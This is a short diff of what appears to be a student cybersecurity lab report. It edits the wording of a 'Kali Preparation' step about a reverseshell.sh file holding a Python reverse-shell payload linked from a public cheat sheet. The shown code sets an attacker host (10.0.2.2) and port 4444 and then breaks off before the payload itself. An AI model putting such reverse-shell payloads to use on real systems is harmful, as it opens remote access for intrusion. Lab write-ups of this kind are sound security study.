huseinovicelma/cybersecurity_report/home.md

 ## Kali Preparation
 First of all, all the necessary files were created on Kali.
-First, the `reverseshell.sh` file, where the is the [payload](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/) in python
+First, the `reverseshell.sh` file, where the [payload](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/) is in python
 ```py
 export RHOST="10.0.2.2";
 export RPORT=4444;